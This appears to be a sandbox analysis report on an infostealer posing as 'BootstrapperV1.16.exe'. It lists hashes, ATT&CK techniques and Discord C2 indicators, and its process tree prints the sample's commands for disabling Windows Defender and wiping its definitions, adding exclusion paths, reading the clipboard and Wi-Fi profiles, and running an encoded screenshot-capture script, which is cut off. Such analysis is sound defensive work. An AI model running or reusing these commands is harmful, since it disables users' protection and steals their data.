3b5869397c4daaf4badca0590254e90e09d3e25373524d2952ae815432b35338

Resubmissions

22/08/2024, 01:53

240822-ca4v1asepb 10

22/08/2024, 01:52

240822-cafs6sselc 10

22/08/2024, 01:48

240822-b78d1ssdke 10

Analysis

max time kernel
1512s
max time network
1484s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
22/08/2024, 01:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperV1.16.exe
Size

7.5MB
MD5

d07874e5e697293369d47f6727787711
SHA1

50b44591caf4de65d9abf7b6c9b4e1b3ffab549e
SHA256

3b5869397c4daaf4badca0590254e90e09d3e25373524d2952ae815432b35338
SHA512

2aff151b97d1928375f02175e28dcc24fc293fdfa0f44fa3b5a114914c378fce54af54bd96802063470b10ede717715547488c9695e8e33990a51043b375643e
SSDEEP

196608:mHhByurErvI9pWjg/Qc+4o673pNrabewyzWGPMYnN9s:KyurEUWjZZ4dDLIeTzWGPTNC

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1420	powershell.exe
1132	powershell.exe
4908	powershell.exe
3968	powershell.exe
1164	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.16.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5848	cmd.exe
5096	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5240	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe
2148	BootstrapperV1.16.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x000100000002aa77-21.dat	upx
behavioral4/memory/2148-25-0x00007FFAE0B70000-0x00007FFAE1235000-memory.dmp	upx
behavioral4/files/0x000200000002aa6a-27.dat	upx
behavioral4/files/0x000100000002aa75-31.dat	upx
behavioral4/memory/2148-48-0x00007FFAFB880000-0x00007FFAFB88F000-memory.dmp	upx
behavioral4/memory/2148-30-0x00007FFAF2B90000-0x00007FFAF2BB5000-memory.dmp	upx
behavioral4/files/0x000100000002aa74-33.dat	upx
behavioral4/files/0x000100000002aa76-34.dat	upx
behavioral4/files/0x000100000002aa7a-37.dat	upx
behavioral4/files/0x000100000002aa7b-38.dat	upx
behavioral4/files/0x000100000002aa7c-39.dat	upx
behavioral4/files/0x000300000002aa68-40.dat	upx
behavioral4/files/0x000100000002aa6b-41.dat	upx
behavioral4/files/0x000100000002aa6c-42.dat	upx
behavioral4/files/0x000100000002aa6d-43.dat	upx
behavioral4/files/0x000100000002aa6e-44.dat	upx
behavioral4/files/0x000100000002aa6f-45.dat	upx
behavioral4/files/0x000100000002aa70-46.dat	upx
behavioral4/files/0x000100000002aa71-47.dat	upx
behavioral4/memory/2148-54-0x00007FFAF2A60000-0x00007FFAF2A8D000-memory.dmp	upx
behavioral4/memory/2148-56-0x00007FFAF7FE0000-0x00007FFAF7FFA000-memory.dmp	upx
behavioral4/memory/2148-58-0x00007FFAF1F20000-0x00007FFAF1F44000-memory.dmp	upx
behavioral4/memory/2148-60-0x00007FFAF0A80000-0x00007FFAF0BFF000-memory.dmp	upx
behavioral4/memory/2148-69-0x00007FFAE0B70000-0x00007FFAE1235000-memory.dmp	upx
behavioral4/memory/2148-72-0x00007FFAF2B90000-0x00007FFAF2BB5000-memory.dmp	upx
behavioral4/memory/2148-71-0x00007FFAF09B0000-0x00007FFAF0A7D000-memory.dmp	upx
behavioral4/memory/2148-70-0x00007FFAE0640000-0x00007FFAE0B69000-memory.dmp	upx
behavioral4/memory/2148-66-0x00007FFAF1EE0000-0x00007FFAF1F13000-memory.dmp	upx
behavioral4/memory/2148-64-0x00007FFAF57F0000-0x00007FFAF57FD000-memory.dmp	upx
behavioral4/memory/2148-62-0x00007FFAF6D10000-0x00007FFAF6D29000-memory.dmp	upx
behavioral4/memory/2148-74-0x00007FFAF2D40000-0x00007FFAF2D54000-memory.dmp	upx
behavioral4/memory/2148-77-0x00007FFAF2A50000-0x00007FFAF2A5D000-memory.dmp	upx
behavioral4/memory/2148-76-0x00007FFAF2A60000-0x00007FFAF2A8D000-memory.dmp	upx
behavioral4/memory/2148-79-0x00007FFAF2330000-0x00007FFAF244A000-memory.dmp	upx
behavioral4/memory/2148-102-0x00007FFAF1F20000-0x00007FFAF1F44000-memory.dmp	upx
behavioral4/memory/2148-116-0x00007FFAF0A80000-0x00007FFAF0BFF000-memory.dmp	upx
behavioral4/memory/2148-296-0x00007FFAF1EE0000-0x00007FFAF1F13000-memory.dmp	upx
behavioral4/memory/2148-306-0x00007FFAE0640000-0x00007FFAE0B69000-memory.dmp	upx
behavioral4/memory/2148-314-0x00007FFAF09B0000-0x00007FFAF0A7D000-memory.dmp	upx
behavioral4/memory/2148-324-0x00007FFAF2D40000-0x00007FFAF2D54000-memory.dmp	upx
behavioral4/memory/2148-341-0x00007FFAF0A80000-0x00007FFAF0BFF000-memory.dmp	upx
behavioral4/memory/2148-336-0x00007FFAF2B90000-0x00007FFAF2BB5000-memory.dmp	upx
behavioral4/memory/2148-335-0x00007FFAE0B70000-0x00007FFAE1235000-memory.dmp	upx
behavioral4/memory/2148-350-0x00007FFAE0B70000-0x00007FFAE1235000-memory.dmp	upx
behavioral4/memory/2148-365-0x00007FFAE0B70000-0x00007FFAE1235000-memory.dmp	upx
behavioral4/memory/2148-389-0x00007FFAF1EE0000-0x00007FFAF1F13000-memory.dmp	upx
behavioral4/memory/2148-393-0x00007FFAF2330000-0x00007FFAF244A000-memory.dmp	upx
behavioral4/memory/2148-392-0x00007FFAF2A50000-0x00007FFAF2A5D000-memory.dmp	upx
behavioral4/memory/2148-391-0x00007FFAF2D40000-0x00007FFAF2D54000-memory.dmp	upx
behavioral4/memory/2148-390-0x00007FFAE0640000-0x00007FFAE0B69000-memory.dmp	upx
behavioral4/memory/2148-388-0x00007FFAF57F0000-0x00007FFAF57FD000-memory.dmp	upx
behavioral4/memory/2148-387-0x00007FFAF6D10000-0x00007FFAF6D29000-memory.dmp	upx
behavioral4/memory/2148-386-0x00007FFAF0A80000-0x00007FFAF0BFF000-memory.dmp	upx
behavioral4/memory/2148-385-0x00007FFAF1F20000-0x00007FFAF1F44000-memory.dmp	upx
behavioral4/memory/2148-384-0x00007FFAF7FE0000-0x00007FFAF7FFA000-memory.dmp	upx
behavioral4/memory/2148-383-0x00007FFAF2A60000-0x00007FFAF2A8D000-memory.dmp	upx
behavioral4/memory/2148-382-0x00007FFAFB880000-0x00007FFAFB88F000-memory.dmp	upx
behavioral4/memory/2148-381-0x00007FFAF2B90000-0x00007FFAF2BB5000-memory.dmp	upx
behavioral4/memory/2148-380-0x00007FFAF09B0000-0x00007FFAF0A7D000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
6	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5028	tasklist.exe
2216	tasklist.exe
3020	tasklist.exe
1352	tasklist.exe
3628	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3080	cmd.exe
4716	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3520	WMIC.exe
2296	WMIC.exe
2836	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2116	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3968	powershell.exe
1420	powershell.exe
3968	powershell.exe
1420	powershell.exe
1164	powershell.exe
1164	powershell.exe
5096	powershell.exe
5096	powershell.exe
948	powershell.exe
948	powershell.exe
948	powershell.exe
5096	powershell.exe
1132	powershell.exe
1132	powershell.exe
1164	powershell.exe
1164	powershell.exe
4908	powershell.exe
4908	powershell.exe
3540	powershell.exe
3540	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3020	tasklist.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	4844	WMIC.exe
Token: SeSecurityPrivilege	4844	WMIC.exe
Token: SeTakeOwnershipPrivilege	4844	WMIC.exe
Token: SeLoadDriverPrivilege	4844	WMIC.exe
Token: SeSystemProfilePrivilege	4844	WMIC.exe
Token: SeSystemtimePrivilege	4844	WMIC.exe
Token: SeProfSingleProcessPrivilege	4844	WMIC.exe
Token: SeIncBasePriorityPrivilege	4844	WMIC.exe
Token: SeCreatePagefilePrivilege	4844	WMIC.exe
Token: SeBackupPrivilege	4844	WMIC.exe
Token: SeRestorePrivilege	4844	WMIC.exe
Token: SeShutdownPrivilege	4844	WMIC.exe
Token: SeDebugPrivilege	4844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4844	WMIC.exe
Token: SeRemoteShutdownPrivilege	4844	WMIC.exe
Token: SeUndockPrivilege	4844	WMIC.exe
Token: SeManageVolumePrivilege	4844	WMIC.exe
Token: 33	4844	WMIC.exe
Token: 34	4844	WMIC.exe
Token: 35	4844	WMIC.exe
Token: 36	4844	WMIC.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeIncreaseQuotaPrivilege	4844	WMIC.exe
Token: SeSecurityPrivilege	4844	WMIC.exe
Token: SeTakeOwnershipPrivilege	4844	WMIC.exe
Token: SeLoadDriverPrivilege	4844	WMIC.exe
Token: SeSystemProfilePrivilege	4844	WMIC.exe
Token: SeSystemtimePrivilege	4844	WMIC.exe
Token: SeProfSingleProcessPrivilege	4844	WMIC.exe
Token: SeIncBasePriorityPrivilege	4844	WMIC.exe
Token: SeCreatePagefilePrivilege	4844	WMIC.exe
Token: SeBackupPrivilege	4844	WMIC.exe
Token: SeRestorePrivilege	4844	WMIC.exe
Token: SeShutdownPrivilege	4844	WMIC.exe
Token: SeDebugPrivilege	4844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4844	WMIC.exe
Token: SeRemoteShutdownPrivilege	4844	WMIC.exe
Token: SeUndockPrivilege	4844	WMIC.exe
Token: SeManageVolumePrivilege	4844	WMIC.exe
Token: 33	4844	WMIC.exe
Token: 34	4844	WMIC.exe
Token: 35	4844	WMIC.exe
Token: 36	4844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3520	WMIC.exe
Token: SeSecurityPrivilege	3520	WMIC.exe
Token: SeTakeOwnershipPrivilege	3520	WMIC.exe
Token: SeLoadDriverPrivilege	3520	WMIC.exe
Token: SeSystemProfilePrivilege	3520	WMIC.exe
Token: SeSystemtimePrivilege	3520	WMIC.exe
Token: SeProfSingleProcessPrivilege	3520	WMIC.exe
Token: SeIncBasePriorityPrivilege	3520	WMIC.exe
Token: SeCreatePagefilePrivilege	3520	WMIC.exe
Token: SeBackupPrivilege	3520	WMIC.exe
Token: SeRestorePrivilege	3520	WMIC.exe
Token: SeShutdownPrivilege	3520	WMIC.exe
Token: SeDebugPrivilege	3520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3520	WMIC.exe
Token: SeRemoteShutdownPrivilege	3520	WMIC.exe
Token: SeUndockPrivilege	3520	WMIC.exe
Token: SeManageVolumePrivilege	3520	WMIC.exe
Token: 33	3520	WMIC.exe
Token: 34	3520	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5736 wrote to memory of 2148	5736	BootstrapperV1.16.exe	81
PID 5736 wrote to memory of 2148	5736	BootstrapperV1.16.exe	81
PID 2148 wrote to memory of 808	2148	BootstrapperV1.16.exe	83
PID 2148 wrote to memory of 808	2148	BootstrapperV1.16.exe	83
PID 2148 wrote to memory of 996	2148	BootstrapperV1.16.exe	84
PID 2148 wrote to memory of 996	2148	BootstrapperV1.16.exe	84
PID 2148 wrote to memory of 248	2148	BootstrapperV1.16.exe	85
PID 2148 wrote to memory of 248	2148	BootstrapperV1.16.exe	85
PID 2148 wrote to memory of 5264	2148	BootstrapperV1.16.exe	89
PID 2148 wrote to memory of 5264	2148	BootstrapperV1.16.exe	89
PID 808 wrote to memory of 3968	808	cmd.exe	92
PID 808 wrote to memory of 3968	808	cmd.exe	92
PID 996 wrote to memory of 1420	996	cmd.exe	93
PID 996 wrote to memory of 1420	996	cmd.exe	93
PID 248 wrote to memory of 3020	248	cmd.exe	91
PID 248 wrote to memory of 3020	248	cmd.exe	91
PID 5264 wrote to memory of 4844	5264	cmd.exe	94
PID 5264 wrote to memory of 4844	5264	cmd.exe	94
PID 2148 wrote to memory of 2596	2148	BootstrapperV1.16.exe	96
PID 2148 wrote to memory of 2596	2148	BootstrapperV1.16.exe	96
PID 2596 wrote to memory of 4740	2596	cmd.exe	98
PID 2596 wrote to memory of 4740	2596	cmd.exe	98
PID 2148 wrote to memory of 4724	2148	BootstrapperV1.16.exe	99
PID 2148 wrote to memory of 4724	2148	BootstrapperV1.16.exe	99
PID 4724 wrote to memory of 5364	4724	cmd.exe	101
PID 4724 wrote to memory of 5364	4724	cmd.exe	101
PID 2148 wrote to memory of 5640	2148	BootstrapperV1.16.exe	102
PID 2148 wrote to memory of 5640	2148	BootstrapperV1.16.exe	102
PID 5640 wrote to memory of 3520	5640	cmd.exe	104
PID 5640 wrote to memory of 3520	5640	cmd.exe	104
PID 2148 wrote to memory of 2288	2148	BootstrapperV1.16.exe	105
PID 2148 wrote to memory of 2288	2148	BootstrapperV1.16.exe	105
PID 2288 wrote to memory of 2296	2288	cmd.exe	107
PID 2288 wrote to memory of 2296	2288	cmd.exe	107
PID 2148 wrote to memory of 1496	2148	BootstrapperV1.16.exe	108
PID 2148 wrote to memory of 1496	2148	BootstrapperV1.16.exe	108
PID 1496 wrote to memory of 1164	1496	cmd.exe	110
PID 1496 wrote to memory of 1164	1496	cmd.exe	110
PID 2148 wrote to memory of 1844	2148	BootstrapperV1.16.exe	111
PID 2148 wrote to memory of 6088	2148	BootstrapperV1.16.exe	112
PID 2148 wrote to memory of 1844	2148	BootstrapperV1.16.exe	111
PID 2148 wrote to memory of 6088	2148	BootstrapperV1.16.exe	112
PID 2148 wrote to memory of 3180	2148	BootstrapperV1.16.exe	115
PID 2148 wrote to memory of 3180	2148	BootstrapperV1.16.exe	115
PID 1844 wrote to memory of 1352	1844	cmd.exe	117
PID 1844 wrote to memory of 1352	1844	cmd.exe	117
PID 6088 wrote to memory of 3628	6088	cmd.exe	118
PID 6088 wrote to memory of 3628	6088	cmd.exe	118
PID 3180 wrote to memory of 6000	3180	cmd.exe	119
PID 3180 wrote to memory of 6000	3180	cmd.exe	119
PID 2148 wrote to memory of 5848	2148	BootstrapperV1.16.exe	120
PID 2148 wrote to memory of 5848	2148	BootstrapperV1.16.exe	120
PID 2148 wrote to memory of 5520	2148	BootstrapperV1.16.exe	121
PID 2148 wrote to memory of 5520	2148	BootstrapperV1.16.exe	121
PID 2148 wrote to memory of 3288	2148	BootstrapperV1.16.exe	123
PID 2148 wrote to memory of 3288	2148	BootstrapperV1.16.exe	123
PID 2148 wrote to memory of 3080	2148	BootstrapperV1.16.exe	125
PID 2148 wrote to memory of 3080	2148	BootstrapperV1.16.exe	125
PID 2148 wrote to memory of 4140	2148	BootstrapperV1.16.exe	128
PID 2148 wrote to memory of 4140	2148	BootstrapperV1.16.exe	128
PID 3288 wrote to memory of 1868	3288	cmd.exe	130
PID 3288 wrote to memory of 1868	3288	cmd.exe	130
PID 3080 wrote to memory of 4716	3080	cmd.exe	131
PID 3080 wrote to memory of 4716	3080	cmd.exe	131

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4332	attrib.exe
3060	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.16.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.16.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5736
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.16.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.16.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.16.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.16.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:248
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5264
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4724
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5640
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6088
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5520
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4140
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4236
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGU